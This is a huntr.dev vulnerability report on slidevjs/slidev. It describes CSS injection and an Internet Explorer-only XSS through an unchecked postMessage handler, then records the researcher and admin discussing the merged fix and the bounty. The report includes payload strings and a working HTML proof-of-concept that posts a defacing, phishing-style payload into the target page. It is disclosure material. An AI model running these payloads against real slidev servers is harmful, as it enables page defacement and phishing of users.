External Control of File Name or Path in slidevjs/slidev

Valid

Reported on

Jan 3rd 2022


Description

Vulnerability: CSS injection and Limited XSS via postMessage

While reading the code, I came across packages/client/iframes/monaco/index.ts file, where a message eventListener is being used. The callback function adds the content of message inside <style> tag.

This way, the attacker can post a message with following payloads:

{"type": "slidev-monaco", "data": {"style": "} div { color: expression(alert(1)); } b{"} : XSS in IE (Internet Explorer) browser

{"type": "slidev-monaco", "data": {"style": "} div { background-color: #ff0000; } b{"}: CSS injection in all browsers

Proof of Concept

1 Open the following HTML file on your browser

NOTE: Please replace <SERVER-IP> and <PATH-TO-SLIDEV> with appropriate values in the following html file

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>Exploit XSS and CSS-injection in slidev</title>
</head>
<body>

<script>
    function exploit(){
    var target = 'http://<SERVER-IP>:3030/@fs/<PATH-TO-SLIDEV>/node_modules/@slidev/client/iframes/monaco/index.html';

    var payload = '{"type": "slidev-monaco", "data": {"style": "} div { background-image: url(\'https://c.tenor.com/oJoWZIWxt3wAAAAC/the-hacker-matrix.gif\')} span { background-color: #ff0000; font-size: 50px; text-align: center} b{", "code": "\\nHELLO, you have been hacked. Submit your details. Phishing attempts..."}}';
    
    window.poc = window.open(target);

    setTimeout(function(){
        window.poc.postMessage(
            payload,
            '*'
        );
    }, 2000);

}
</script>

<input type="button" onclick="exploit()" value="EXPLOIT">

</body>
</html>

2 Click on EXPLOIT button and a new window will open showing injected CSS and code in the slidev server webpage

Impact

1 Execute arbitrary javascript code in IE browser using expression() function.

2 Inject arbitrary CSS in webpage of slidev. It can be used in phishing campaigns by manipulating the users to do unintended actions.

3 Read parts of HTML page using CSS selectors.

We are processing your report and will contact the slidevjs/slidev team within 24 hours. 5 months ago
Rohan Sharma submitted a
5 months ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 5 months ago
Rohan Sharma
3 months ago

Researcher


Hi @admin It have been a month that we have not received any response from the maintainer. So, yesterday I created a PR to fix this vulnerability. The PR has been approved and merged in the official repository. https://github.com/slidevjs/slidev/pull/486

which means the vulnerability is fixed now. I have seen in hacktivity report that if maintainer does not join huntr.dev platform and vulnerability get fixed, then @admin can validate the vulnerability and fix on the behalf of maintainer. I would like you to do the same for this report.

note: the PR/commit title is changed by maintainer (i.e. "fix: prevent XSS"), however it was not just an XSS. it had wide scope along with CSSi, limited xss on IE etc. as mentioned in my report

Thank you

Jamie Slome
3 months ago

Admin


@r0hansh - thanks for getting in touch!

I will first try my best to get the maintainer to validate the findings first. I have dropped a message on the PR to ask if they would take a look at this report, and approve accordingly.

If we do not receive any response from the maintainer on this report, we will move on to the next step 👍

Rohan Sharma
3 months ago

Researcher


sure, Jamie. sounds good to me.

Rohan Sharma
3 months ago

Researcher


@jamieslome

Jamie Slome
3 months ago

Admin


@r0hansh - I have looked into this further, and can see that the fix was shared publicly on the vulnerable repository, which we consider to break the disclosure policy of our platform, as we do request that vulnerabilities are not shared elsewhere, other than on our platform, to receive bounty rewards.

We are happy to approve the report, and confirm the fix, but will have to zero out the bounties if we move forward in this way.

Before I proceed, I will wait to hear your thoughts.

Rohan Sharma
3 months ago

Researcher


@jamieslome cool. I'm fine with it.

Suggestion: Right now, we can submit the fix just after submitting a vulnerability report on huntr.dev and that fix is public too (but on researcher's forked repo). Both ways i.e. raising a PR on vulnerable repository and submitting a patch on personal forked repo will make the fix public. So, I think that your team should find a better way to submit the fix (so that it doesn't get public in any case). For e.g.: only submit patched code on huntr.dev platform and only accessible to the maintainers.

Jamie Slome
3 months ago

Admin


Thank you for your confirmation @r0hansh.

I will go ahead and approve/fix the report.

We appreciate your feedback on a way to submit private fixes and do see the need for this. If possible, I'd love for you to consolidate your feedback into a GitHub Issue on our public repository, where we can best track your request and update you with any progress:

Create feature request

Jamie Slome validated this vulnerability 3 months ago
Rohan Sharma has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jamie Slome confirmed that a fix has been merged on 92db17 3 months ago
Rohan Sharma has been awarded the fix bounty
index.ts#L102-L145 has been validated
to join this conversation